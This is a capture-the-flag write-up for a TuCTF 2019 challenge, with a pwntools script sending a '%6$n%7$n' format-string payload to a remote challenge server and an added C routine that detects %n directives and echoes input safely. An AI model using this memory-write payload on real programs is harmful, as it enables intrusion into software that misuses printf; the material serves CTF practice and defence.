Tags: format-string printf pwn 

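from pwn import *

elf = ELF('./printfun')
context.binary = './printfun'

# Format string vulnerability: our input is used as the printf format string.
# %n stores the number of bytes printed so far through a pointer argument, so
# %6$n%7$n writes the same count through the pointers in argument slots 6 and 7.
payload = b'this is mind blowing! %6$n%7$n'

# r = elf.process()  # run against the local binary instead
r = remote('chal.tuctf.com', 30501)
r.clean()            # discard the banner/prompt
r.sendline(payload)
r.clean()
print(r.readline())  # show the program's response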
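
A defensive counterpart to the payload above, as an added example that is not part of the original writeup: a C check that counts `%n`-family directives in untrusted input, and the constant-format echo that renders them harmless. The function names and the sample strings in `main` are constructed for illustration; the challenge binary's source is not shown on this page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Count %n-family conversions, the only printf directives that write to
 * memory, in a string that might end up as a format. Handles "%%",
 * positional "N$", flags, width, precision and length modifiers (%hn, %hhn). */
int count_write_directives(const char *s)
{
    int hits = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;                                      /* step past '%' */
        if (*s == '%') { s++; continue; }         /* literal percent sign */
        const char *p = s;
        while (isdigit((unsigned char)*p)) p++;
        if (p > s && *p == '$') s = p + 1;        /* positional argument "N$" */
        s += strspn(s, "-+ #0'");                 /* flags */
        s += strspn(s, "0123456789*$");           /* width */
        if (*s == '.') { s++; s += strspn(s, "0123456789*$"); } /* precision */
        s += strspn(s, "hlqjzLt");                /* length modifiers */
        if (*s == 'n') hits++;
        if (*s) s++;                              /* step past the conversion */
    }
    return hits;
}

/* Vulnerable pattern (not compiled here):  printf(untrusted);
 * Hardened echo: the untrusted bytes are data for a constant "%s" format,
 * never the format itself, so directives in them are copied out verbatim. */
int echo_safe(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, "%s", untrusted);
}

int main(void)
{
    /* Constructed sample inputs; the first is the payload from this page. */
    const char *samples[] = { "this is mind blowing! %6$n%7$n",
                              "100%% done, %s", "%08x.%hhn" };
    char buf[64];
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        echo_safe(buf, sizeof buf, samples[i]);
        printf("%d write directive(s), echoed as: %s\n",
               count_write_directives(samples[i]), buf);
    }
    return 0;
}
```

Building the target with `-Wformat -Wformat-security` makes GCC and Clang warn on the vulnerable `printf(untrusted)` pattern at compile time.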

Original writeup (https://github.com/AshishKumar4/CTF_Writeups/blob/master/TuCTF_2019/PWN/printfun/exploit.py).